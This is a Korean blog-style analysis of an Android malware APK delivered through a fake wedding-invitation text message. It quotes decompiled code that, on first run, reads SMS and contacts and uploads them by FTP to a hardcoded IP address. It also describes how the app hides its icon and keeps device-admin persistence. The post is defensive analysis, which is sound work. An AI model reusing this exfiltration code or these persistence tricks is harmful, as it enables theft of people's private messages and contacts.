문자로 청첩장이 왔다기에 보니, 악성앱으로 사려되었다.

그래서 맥북에서 받아보니, DANAL.apk 라는 이름으로 되어 있었다.

다른 사례들과 비교해 봤는데, http://darksoulstory.tistory.com/category/Android/%20Android%20Malware%EB%B6%84%EC%84%9D

동일한 녀석을 아닐 걸로 보였다.

마지막 문자와 주소록을 뒤져서 ftp로 올리는 기능으로 보이는데, 설치를 안 해봐서 일단은 화면을 확인할 수 없었다. 

예전에 설치했던, android x86 2.2 버전으로 test 해 봤다.

  private void init()

  {

    this.sPreferences = getSharedPreferences("data", 0);

    if (FirstRun.IsFirstRun(this.sPreferences))

    {

      SMSOutSender.send("", this);

      getLastSMS();

      new Thread()

      {

        public void run()

        {

          MainActivity.this.readAllContacts();

          MainActivity.this.ftpUpload("126.5.25.32", "5331", "getwiner", "", "/", "/sdcard/", "contact.txt");

          super.run();

        }

      }

      .start();

    }

    System.out.println("MainActivity:init()");

    finish();

  }

안드로이드 sdk 에서 해서 그런지 몰라도 제대로 실행되는건지 잘 확인이 안되고, 지워지지도 않는다. 쩝

관리자 권한을 주었기 때문에 그런 것 이었다.

그래서 관리자 권한을 비활성화 하고 삭제했다.

다시 설치하면서 보니, 녀석은 재기동 하면, 아이콘이 사라지지만 설치되지 않은 척 하면서 계속 상주하며, 작업하는 무서운 놈이다.

뭔 데이터를 갖고 있는지는 몰라도 보유하고 있다.

data.xml 에는 별 내용이 없고, sms.db 에는 테이블을 생성하는 쿼리가 들어 있다. 내용을 빼가려는 듯.

암튼 sms를 보내면 항상 실행상태이면서 정보를 빼돌리는 기능을 하는 듯 하다.

ip가 박혀있어서 막히면 무용지물이 되긴 하지만, 내부에 계속 data를 쌓는다면, 언젠가는 또다른 앱에 의해 탈취될 가능성이 있으므로 삭제하는게 좋겠다.